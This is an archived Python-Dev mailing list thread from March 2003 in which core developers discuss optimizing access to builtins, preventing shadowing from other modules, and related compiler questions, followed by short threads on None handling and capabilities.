Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <20030328055113.GA30405@glacier.arctrix.com>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net> <20030328035031.GB30245@glacier.arctrix.com> <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net> <20030328055113.GA30405@glacier.arctrix.com>
Message-ID: <20030328094441.GA10818@hishome.net>

On Thu, Mar 27, 2003 at 09:51:13PM -0800, Neil Schemenauer wrote:
> Guido van Rossum wrote:
> > Though you probably would only want to warn when this is done to a .py
> > module -- C extensions should be exempt.
> 
> Exempt from poking or being poked?
> 
> > And the warning should only warn about inserting names that are
> > actually builtins.
> 
> I have rough patch.  The idea is to have the tp_setattro slot of modules
> check if the name being set is a builtin.  

Does it check if it's one of the standard __builtin__ module or whether 
it is an attribute of whatever object is currently set as the module's 
__builtins__ attribute?

    Oren


From python@rcn.com  Fri Mar 28 10:58:44 2003
From: python@rcn.com (Raymond Hettinger)
Date: Fri, 28 Mar 2003 05:58:44 -0500
Subject: [Python-Dev] Fast access to __builtins__
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <005d01c2f519$00acb020$aa11a044@oemcomputer>

[GvR]
> Hi Raymond.  Too bad you couldn't make it to the conference!  We're
> all having a great time on and off the GWU premises. 

Glad you guys are having a great time.  I wish I could be there.


> I used your "more zen" on a slide in my keynote.

Cool.  Any chance of getting your keynote slides on the net?


> > From past rumblings, I gather that Python is moving
> > towards preventing __builtins__ from being shadowed.
> 
> You must be misunderstanding.
> 
> The only thing I want to forbid is to stick a name in *another*
> module's globals that would shadow a builtin.

Yes, that *is* different.  
Allowing shadows means having to watch out for trees.


> The idea of forbidding module B in the first example is that the
> optimizer is allowed to replace len(a) with a bytecode that calls
> PyOject_Size() rather than looking up "len" in globals and builtins.
> The optimizer should only be allowed to make this assumption if
> careful analysis of an entire module doesn't reveal any possibility
> that "len" can be shadowed
 . . .
> BTW this idea is quite old; I've described it a few years ago under a
> subject something like "low-hanging fruit".


The fruit is a bit high.  Doing a full module analysis means
deferring the optimization for a second pass after all the code
has already been generated.  It's doable, but much harder.

def f(x):
    return len(x) + 10       # knowing whether to optimize this

def g():
    global len                   # when this is allowed
    len = lambda x: 5       # is a bear

The task is much simpler if it can be known in advance that
the substitution is allowed (i.e. a module level switch like:
__fastbuiltins__ = True).


Raymond Hettinger


From jeremy@alum.mit.edu  Fri Mar 28 12:29:54 2003
From: jeremy@alum.mit.edu (Jeremy Hylton)
Date: 28 Mar 2003 07:29:54 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <1048826730.23083.90.camel@localhost.localdomain>
 <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1048854593.23083.97.camel@localhost.localdomain>

On Thu, 2003-03-27 at 23:49, Guido van Rossum wrote:
> Frankly, I'm a bit confused by your post.  Maybe I don't understand
> what you're proposing?

Modules are modules, right?  That is, pickle.py and cPickle.so are both
represented as module objects at runtime.  A C extension can call
PyModule_GetDict() on any module.  If so, then any extension module can
add names to the __dict__ of any Python module.  The problem is that
modules expose their representation at the C API level (namespace
implemented as PyDictObject), so it's difficult to forbid things at the
C level.

Jeremy


From guido@python.org  Fri Mar 28 12:23:44 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 07:23:44 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Thu, 27 Mar 2003 21:51:13 PST."
 <20030328055113.GA30405@glacier.arctrix.com>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <20030328055113.GA30405@glacier.arctrix.com>
Message-ID: <200303281223.h2SCNiU20028@pcp02138704pcs.reston01.va.comcast.net>

> Guido van Rossum wrote:
> > Though you probably would only want to warn when this is done to a .py
> > module -- C extensions should be exempt.
> 
> Exempt from poking or being poked?

>From being poked.  Poking from C code can't really be prevented, but
isn't a problem.

> > And the warning should only warn about inserting names that are
> > actually builtins.
> 
> I have rough patch.  The idea is to have the tp_setattro slot of modules
> check if the name being set is a builtin.  It seems to work but perhaps
> there are cases that make that approach invalid.  Time for bed now. :-)

SF?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri Mar 28 12:26:54 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 07:26:54 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Fri, 28 Mar 2003 09:38:28 +0100."
 <3E840A04.6070700@lemburg.com>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <1048826730.23083.90.camel@localhost.localdomain>
 <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
 <3E840A04.6070700@lemburg.com>
Message-ID: <200303281226.h2SCQsc20058@pcp02138704pcs.reston01.va.comcast.net>

> > I'd be happy to proclaim that doing something like
> > 
> >   import X
> >   d = X.__dict__
> >   d["spam"] = 42    # or  exec "spam = 42" in d 
> > 
> > is always prohibited.
> 
> That would break lazy module imports such as the one I'm using
> in mx.Misc.LazyModule.py.

But you could rewrite LazyModule.py to use setattr(X, "spam", 42), right?

I don't think it's worth it to have a dict proxy that allows certain
keys to be set but not others.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri Mar 28 12:30:16 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 07:30:16 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Fri, 28 Mar 2003 10:31:30 +0100."
 <200303281031.30093.aleax@aleax.it>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <1048826730.23083.90.camel@localhost.localdomain>
 <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
 <200303281031.30093.aleax@aleax.it>
Message-ID: <200303281230.h2SCUHh20080@pcp02138704pcs.reston01.va.comcast.net>

> > I don't see the problem.  Typically, C extension modules don't have
> > Python code that runs in their globals, so messing with a C
> > extension's globals from the outside has no bad effect on Python code.
> 
> It happens, though -- for code whose performance is not important,
> e.g. initialization and "resetting" kind of stuff, a PyRun_String can be
> SO much more concise and handier than meticulous expansion of
> basically the same things into tens of lines of C code... since
> "messing from the outside" happens after initialization, and the use
> cases I can easily find are all specifically DURING initialization, it may
> be that this problem is too rare to worry about, but, I'm not so sure.

I think this use case won't have a problem.  The C code has access to the
real dict, so PyRun_String() never knows that it's poking into a
module's globals.  Also this is done during module initialization.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Fri Mar 28 12:28:25 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 28 Mar 2003 13:28:25 +0100
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303281226.h2SCQsc20058@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net> <20030328035031.GB30245@glacier.arctrix.com> <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net> <1048826730.23083.90.camel@localhost.localdomain> <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net> <3E840A04.6070700@lemburg.com> <200303281226.h2SCQsc20058@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E843FE9.6030400@lemburg.com>

Guido van Rossum wrote:
>>>I'd be happy to proclaim that doing something like
>>>
>>>  import X
>>>  d = X.__dict__
>>>  d["spam"] = 42    # or  exec "spam = 42" in d 
>>>
>>>is always prohibited.
>>
>>That would break lazy module imports such as the one I'm using
>>in mx.Misc.LazyModule.py.
> 
> But you could rewrite LazyModule.py to use setattr(X, "spam", 42), right?

Sure.

> I don't think it's worth it to have a dict proxy that allows certain
> keys to be set but not others.

The question is: why make this complicated ?

If the programmer
enables __fast_builtins__ (or similar) in the module scope,
she should be aware that tweaking the module globals from the
outside won't have the desired effect.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 28 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                      4 days left
EuroPython 2003, Charleroi, Belgium:                        88 days left


From guido@python.org  Fri Mar 28 12:33:19 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 07:33:19 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Fri, 28 Mar 2003 04:44:42 EST."
 <20030328094441.GA10818@hishome.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <20030328055113.GA30405@glacier.arctrix.com>
 <20030328094441.GA10818@hishome.net>
Message-ID: <200303281233.h2SCXJO20101@pcp02138704pcs.reston01.va.comcast.net>

> Does it check if it's one of the standard __builtin__ module or
> whether it is an attribute of whatever object is currently set as
> the module's __builtins__ attribute?

Only standard builtins need to be exempt, because the compiler isn't
going to optimize non-standard builtins.  That's because (a) there
won't be special opcodes that implement those builtins directly, and
(b) the bytecode compiler doesn't know the contents of __builtins__ so
it can't possibly know about nonstandard builtins anyway to generate a
LOAD_BUILTIN opcode.

BTW, I expect that nonstandard builtins will be ruled out in some
future version of the language, or will have to be declared
differently.  They are too confusing for the human reader of the code.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mcherm@mcherm.com  Fri Mar 28 12:34:53 2003
From: mcherm@mcherm.com (Michael Chermside)
Date: Fri, 28 Mar 2003 04:34:53 -0800
Subject: [Python-Dev] Re: Fast access to __builtins__
Message-ID: <1048854893.3e84416d25541@mcherm.com>

Raymond writes:
> I've already tried out a pure python proof-of-concept 

Does that mean that you can give us some idea what kind of
performance boost this actually resulted in?

-- Michael Chermside


From guido@python.org  Fri Mar 28 12:39:04 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 07:39:04 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Fri, 28 Mar 2003 05:58:44 EST."
 <005d01c2f519$00acb020$aa11a044@oemcomputer>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <005d01c2f519$00acb020$aa11a044@oemcomputer>
Message-ID: <200303281239.h2SCd4K20135@pcp02138704pcs.reston01.va.comcast.net>

> Cool.  Any chance of getting your keynote slides on the net?

Yes, after the conference.

> > > From past rumblings, I gather that Python is moving
> > > towards preventing __builtins__ from being shadowed.
> > 
> > You must be misunderstanding.
> > 
> > The only thing I want to forbid is to stick a name in *another*
> > module's globals that would shadow a builtin.
> 
> Yes, that *is* different.  
> Allowing shadows means having to watch out for trees.

Being poetic?

> > The idea of forbidding module B in the first example is that the
> > optimizer is allowed to replace len(a) with a bytecode that calls
> > PyOject_Size() rather than looking up "len" in globals and builtins.
> > The optimizer should only be allowed to make this assumption if
> > careful analysis of an entire module doesn't reveal any possibility
> > that "len" can be shadowed
>  . . .
> > BTW this idea is quite old; I've described it a few years ago under a
> > subject something like "low-hanging fruit".
> 
> The fruit is a bit high.  Doing a full module analysis means
> deferring the optimization for a second pass after all the code
> has already been generated.  It's doable, but much harder.

You're stuck in a one-pass compiler mindset.  We build a parse tree
for the entire module before we start generating bytecode.  We already
have tools to do namespace analysis for the entire tree (Jeremy added
these to implement nested scopes).

> def f(x):
>     return len(x) + 10       # knowing whether to optimize this
> 
> def g():
>     global len                   # when this is allowed
>     len = lambda x: 5       # is a bear
> 
> The task is much simpler if it can be known in advance that
> the substitution is allowed (i.e. a module level switch like:
> __fastbuiltins__ = True).

-1000.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri Mar 28 12:45:03 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 07:45:03 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of 28 Mar 2003 07:29:54 EST."
 <1048854593.23083.97.camel@localhost.localdomain>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <1048826730.23083.90.camel@localhost.localdomain>
 <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
 <1048854593.23083.97.camel@localhost.localdomain>
Message-ID: <200303281245.h2SCj3n20179@pcp02138704pcs.reston01.va.comcast.net>

> > Frankly, I'm a bit confused by your post.  Maybe I don't understand
> > what you're proposing?
> 
> Modules are modules, right?  That is, pickle.py and cPickle.so are both
> represented as module objects at runtime.  A C extension can call
> PyModule_GetDict() on any module.  If so, then any extension module can
> add names to the __dict__ of any Python module.  The problem is that
> modules expose their representation at the C API level (namespace
> implemented as PyDictObject), so it's difficult to forbid things at the
> C level.

Oh sure.  I don't think it's necessary to forbid things at the C API
level in the sense of making it impossible to do.  We'll just document
that C code shouldn't do that.  There's plenty that C code could do
but shouldn't because it breaks the world.

I don't expect there will be much C in violation of this prohibition.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri Mar 28 12:48:42 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 07:48:42 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Fri, 28 Mar 2003 13:28:25 +0100."
 <3E843FE9.6030400@lemburg.com>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <1048826730.23083.90.camel@localhost.localdomain>
 <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
 <3E840A04.6070700@lemburg.com>
 <200303281226.h2SCQsc20058@pcp02138704pcs.reston01.va.comcast.net>
 <3E843FE9.6030400@lemburg.com>
Message-ID: <200303281248.h2SCmgP20200@pcp02138704pcs.reston01.va.comcast.net>

> The question is: why make this complicated ?
> 
> If the programmer enables __fast_builtins__ (or similar) in the
> module scope, she should be aware that tweaking the module globals
> from the outside won't have the desired effect.

I don't want programmers to have to add all sorts of magical
incantations to their top to guide the optimizer.  Today it's
__fast_builtins__, tomorrow it's a promise that a class won't be
poked.

Poking a module from the outside is frequent enough, but poking names
that shadow builtins is extremely rare.  So almost all modules would
need __fast_builtins__, because it would almost always help.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry@python.org  Fri Mar 28 12:46:37 2003
From: barry@python.org (Barry Warsaw)
Date: Fri, 28 Mar 2003 07:46:37 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303281233.h2SCXJO20101@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <50AD9BA1-611B-11D7-98FE-003065EEFAC8@python.org>

On Friday, March 28, 2003, at 07:33 AM, Guido van Rossum wrote:

> BTW, I expect that nonstandard builtins will be ruled out in some
> future version of the language, or will have to be declared
> differently.  They are too confusing for the human reader of the code.

When you say "nonstandard builtins", do you mean nonstandard names
or nonstandard values, or both?  E.g. assigning gettext.ugettext() to 
builtin
_() or  setting open() to some debugging func.

I wouldn't want to completely disallow these, but I'd be happy if you 
had to
do something special and/or (more) explicit to make them work.

-Barry


From skip@pobox.com  Fri Mar 28 13:30:08 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 28 Mar 2003 07:30:08 -0600
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <50AD9BA1-611B-11D7-98FE-003065EEFAC8@python.org>
References: <200303281233.h2SCXJO20101@pcp02138704pcs.reston01.va.comcast.net>
 <50AD9BA1-611B-11D7-98FE-003065EEFAC8@python.org>
Message-ID: <16004.20064.67576.926961@montanaro.dyndns.org>

    Barry> ... or  setting open() to some debugging func.

    Barry> I wouldn't want to completely disallow these, but I'd be happy if
    Barry> you had to do something special and/or (more) explicit to make
    Barry> them work.

Like a compiler flag to disable the run-time optimization so your debugging
open() would be seen everywhere?

Sort of like Guido's observation about __fastbuiltins__ = True, the frequent
case (regular, optimized version of open()) should be the default, while the
exception requires programmer or user action.

Skip


From nas@python.ca  Fri Mar 28 13:47:34 2003
From: nas@python.ca (Neil Schemenauer)
Date: Fri, 28 Mar 2003 05:47:34 -0800
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303281245.h2SCj3n20179@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net> <20030328035031.GB30245@glacier.arctrix.com> <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net> <1048826730.23083.90.camel@localhost.localdomain> <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net> <1048854593.23083.97.camel@localhost.localdomain> <200303281245.h2SCj3n20179@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030328134734.GA30759@glacier.arctrix.com>

Guido van Rossum wrote:
> I don't think it's necessary to forbid things at the C API level in
> the sense of making it impossible to do.  We'll just document
> that C code shouldn't do that.

What about Python code that modifies that module __dict__ directly?  For
example, using vars() or globals() to get a reference to it and doing
__setitem__ on it.  My warning code only catches assignments that go
through the module tp_setattro slot.  I suppose warning about direct
__dict__ poking would require a proxy object to wrap the module dict.

  Neil


From guido@python.org  Fri Mar 28 14:26:11 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 09:26:11 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Fri, 28 Mar 2003 07:46:37 EST."
 <50AD9BA1-611B-11D7-98FE-003065EEFAC8@python.org>
References: <50AD9BA1-611B-11D7-98FE-003065EEFAC8@python.org>
Message-ID: <200303281426.h2SEQB720449@pcp02138704pcs.reston01.va.comcast.net>

> > BTW, I expect that nonstandard builtins will be ruled out in some
> > future version of the language, or will have to be declared
> > differently.  They are too confusing for the human reader of the code.
> 
> When you say "nonstandard builtins", do you mean nonstandard names
> or nonstandard values, or both?  E.g. assigning gettext.ugettext()
> to builtin _() or setting open() to some debugging func.

Nonstandard names.  The compiler can't know what's in __builtin__,
but it can know the names of the official built-ins.

> I wouldn't want to completely disallow these, but I'd be happy if
> you had to do something special and/or (more) explicit to make them
> work.

"from __builtin__ import open" should do it.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri Mar 28 14:33:19 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 09:33:19 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Fri, 28 Mar 2003 05:47:34 PST."
 <20030328134734.GA30759@glacier.arctrix.com>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <1048826730.23083.90.camel@localhost.localdomain>
 <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
 <1048854593.23083.97.camel@localhost.localdomain>
 <200303281245.h2SCj3n20179@pcp02138704pcs.reston01.va.comcast.net>
 <20030328134734.GA30759@glacier.arctrix.com>
Message-ID: <200303281433.h2SEXJq20499@pcp02138704pcs.reston01.va.comcast.net>

> > I don't think it's necessary to forbid things at the C API level in
> > the sense of making it impossible to do.  We'll just document
> > that C code shouldn't do that.
> 
> What about Python code that modifies that module __dict__ directly?  For
> example, using vars() or globals() to get a reference to it and doing
> __setitem__ on it.  My warning code only catches assignments that go
> through the module tp_setattro slot.  I suppose warning about direct
> __dict__ poking would require a proxy object to wrap the module dict.

Yeah, that's another niggling issue.  It would be a shame if using
globals() or vars() anywhere in a module would disable this
optimization.  But we can't make these return a proxy either, because
they are frequently used with e.g. "exec ... in globals()".

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry@python.org  Fri Mar 28 15:19:15 2003
From: barry@python.org (Barry Warsaw)
Date: 28 Mar 2003 10:19:15 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <16004.20064.67576.926961@montanaro.dyndns.org>
References: <200303281233.h2SCXJO20101@pcp02138704pcs.reston01.va.comcast.net>
 <50AD9BA1-611B-11D7-98FE-003065EEFAC8@python.org>
 <16004.20064.67576.926961@montanaro.dyndns.org>
Message-ID: <1048864755.1753.3.camel@geddy>

On Fri, 2003-03-28 at 08:30, Skip Montanaro wrote:

> Like a compiler flag to disable the run-time optimization so your debugging
> open() would be seen everywhere?

Sure, that would work.  I'm still thinking about "from __builtins__
import open".  Part of the issue there is that you might not be sure
/which/ open is causing the problems.  But I agree that this is not a
common case; I don't even think it would be common programming practice
(i.e. my use case is primarily debugging).

-Barry

P.S. I don't actually poke _() into builtins :)


From python@rcn.com  Fri Mar 28 23:05:17 2003
From: python@rcn.com (Raymond Hettinger)
Date: Fri, 28 Mar 2003 18:05:17 -0500
Subject: [Python-Dev] Re: Fast access to __builtins__
References: <1048854893.3e84416d25541@mcherm.com>
Message-ID: <004b01c2f57e$7fb13700$bf11a044@oemcomputer>

[Raymond]
> > I've already tried out a pure python proof-of-concept 

[Michael Chermside]
> Does that mean that you can give us some idea what kind of
> performance boost this actually resulted in?

It depends on what you're timing but it is not a big win.

* Speed doubles in demo code that just makes references to globals
   but is much more modest when the builtins are called.  This shows
   that the call time is more significant than the reference time:

        def f(i):
            dict; hasattr; float; pow; list; range   # speed more than doubles
            hex(i); str(i); oct(i); int(i); float(i)    # 12% gain

*  Contrived examples show the best gains while code from real apps 
    show smaller improvements:

    def shuffle(random=random.random):     # 6% gain
        x = list('abcdefghijklmnopqrstuvwyz0123456789')
        for i in xrange(len(x)-1, 0, -1):
            j = int(random() * (i+1))
           x[i], x[j] = x[j], x[i]

* PyStone does not use any builtins.

* Scanning my own sources, it looks like some of the builtins
   almost never appear inside loops (dir, map, filter, zip, dict, range).
   The ones that are in loops usually do something simple (int, str,
   chr, len).  Either way, builtin access never seems to dominate
   the running time.  OTOH, maybe that's just the way I write code.


Raymond Hettinger


From python@rcn.com  Sat Mar 29 07:11:03 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sat, 29 Mar 2003 02:11:03 -0500
Subject: [Python-Dev] Fast access to __builtins__
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net> <005d01c2f519$00acb020$aa11a044@oemcomputer> <200303281239.h2SCd4K20135@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <001e01c2f5c2$5e490720$990ca044@oemcomputer>

> > The fruit is a bit high.  Doing a full module analysis means
> > deferring the optimization for a second pass after all the code
> > has already been generated.  It's doable, but much harder.
> 
> You're stuck in a one-pass compiler mindset.  We build a parse tree
> for the entire module before we start generating bytecode.  We already
> have tools to do namespace analysis for the entire tree (Jeremy added
> these to implement nested scopes).
 . . .
> > The task is much simpler if it can be known in advance that
> > the substitution is allowed (i.e. a module level switch like:
> > __fastbuiltins__ = True).
> 
> -1000.

Having ruled out a module level switch, the -O flag, and the -OO
flag, that leaves the namespace analysis of the entire tree or taking
an approach that doesn't change the bytecode.  

Taking the second approach, I've loaded a small patch for caching
lookups into the __builtins__ namespace:

       www.python.org/sf/711722

It's not as fast as using LOAD_CONST, but is safe in all but one
extreme case:  calling the function, having an intervening poke
into the __builtins__ module, and then calling the function again.

I put the cache lookup in the safest possible place.  It can be made
twice as fast by putting it before the func_globals() lookup.  That 
works in all cases except:  calling the function, having an intervening 
shadowing global assignment, and then calling the function again.
This doesn't come-up anywhere in the test suite, my own apps,
or apps I've downloaded.  Note, regular shadowing (before the first
function call) continues to work fine.

The bad news is that I've made many timings and found only modest
speed-ups in real code.  It turns out that access time for builtins is
less significant than the time to call and execute those builtins. 
But, every little bit helps.


Raymond Hettinger


From mal@lemburg.com  Sat Mar 29 11:09:46 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sat, 29 Mar 2003 12:09:46 +0100
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <001e01c2f5c2$5e490720$990ca044@oemcomputer>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>	<200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>	<005d01c2f519$00acb020$aa11a044@oemcomputer>	<200303281239.h2SCd4K20135@pcp02138704pcs.reston01.va.comcast.net> <001e01c2f5c2$5e490720$990ca044@oemcomputer>
Message-ID: <3E857EFA.8010205@lemburg.com>

Raymond Hettinger wrote:
> The bad news is that I've made many timings and found only modest
> speed-ups in real code.  It turns out that access time for builtins is
> less significant than the time to call and execute those builtins. 
> But, every little bit helps.

Perhaps you ought to look into special casing calling builtins,
e.g. by adding a byte code CALL_BUILTIN ?!

Since the signatures of the builtins are known in advance, the
calling overhead could be reduced, though I'm not sure how much
more can be gained since the function call code was refactored.

Another idea which might be worth looking into is that of speeding
up parsing of C function call arguments, e.g. by caching the results
or adding fast paths for common combinations.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 29 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                      3 days left
EuroPython 2003, Charleroi, Belgium:                        87 days left


From Raymond Hettinger" <python@rcn.com  Sat Mar 29 21:02:10 2003
From: Raymond Hettinger" <python@rcn.com (Raymond Hettinger)
Date: Sat, 29 Mar 2003 16:02:10 -0500
Subject: [Python-Dev] Compiler treats None both as a constant and variable
Message-ID: <002001c2f636$77ad2ce0$e60ca044@oemcomputer>

>>> def f():
 None  

>>> dis(f)
2           0 LOAD_GLOBAL              0 (None)
              3 POP_TOP             
              4 LOAD_CONST               0 (None)
              7 RETURN_VALUE 

>>> None = 1
<stdin>:1: SyntaxWarning: assignment to None
>>> f() == None
False


Is this a bug?
Should the compiler use the GLOBAL in both places?
Or, is it reasonable to use CONST in both places?


Raymond Hettinger


From tjreedy@udel.edu  Sat Mar 29 21:41:54 2003
From: tjreedy@udel.edu (Terry Reedy)
Date: Sat, 29 Mar 2003 16:41:54 -0500
Subject: [Python-Dev] Re: Compiler treats None both as a constant and variable
References: <002001c2f636$77ad2ce0$e60ca044@oemcomputer>
Message-ID: <b653p0$gbb$1@main.gmane.org>

"Raymond Hettinger" <raymond.hettinger@verizon.net> wrote in message
news:002001c2f636$77ad2ce0$e60ca044@oemcomputer...
> >>> def f():
>  None
>
> >>> dis(f)
> 2           0 LOAD_GLOBAL              0 (None)
>               3 POP_TOP
>               4 LOAD_CONST               0 (None)
>               7 RETURN_VALUE
>
> >>> None = 1
> <stdin>:1: SyntaxWarning: assignment to None
> >>> f() == None
> False
>
>
> Is this a bug?

If one understands (as I do) the default return 'None' to mean the
singleton NoneType object that the name 'None' is assumed to be bound
to in the docs and which it is bound to on startup, then no.

> Should the compiler use the GLOBAL in both places?
> Or, is it reasonable to use CONST in both places?

I understood the latter to be the plan after a sufficient warning
period.

TJR


From ping@zesty.ca  Sun Mar 30 00:27:50 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Sat, 29 Mar 2003 18:27:50 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303102023.h2AKNAw23873@oma.cosc.canterbury.ac.nz>
Message-ID: <Pine.LNX.4.33.0303291827260.10689-100000@server1.lfw.org>

On Tue, 11 Mar 2003, Greg Ewing wrote:
> Perhaps it would be useful to distinguish between what
> might be called "read-only" introspection, and more
> powerful forms of introspection.
>
> Usually it doesn't do any harm to be able to find out
> things like what class an object belongs to and what
> methods it supports, so perhaps these kinds of
> introspections don't need to be restricted by default.

A serious flaw with this particular point is that Python
does not separate the identity of a class from the power
to create instances of that class.  Having access to a
particular instance should certainly not allow one to
ask it for its class, and then instantiate the class with
arbitrary constructor arguments.


-- ?!ng


From ping@zesty.ca  Sun Mar 30 00:31:18 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Sat, 29 Mar 2003 18:31:18 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <3E6CAF65.4040505@zope.com>
Message-ID: <Pine.LNX.4.33.0303291829420.10689-100000@server1.lfw.org>

On Mon, 10 Mar 2003, Jim Fulton wrote:
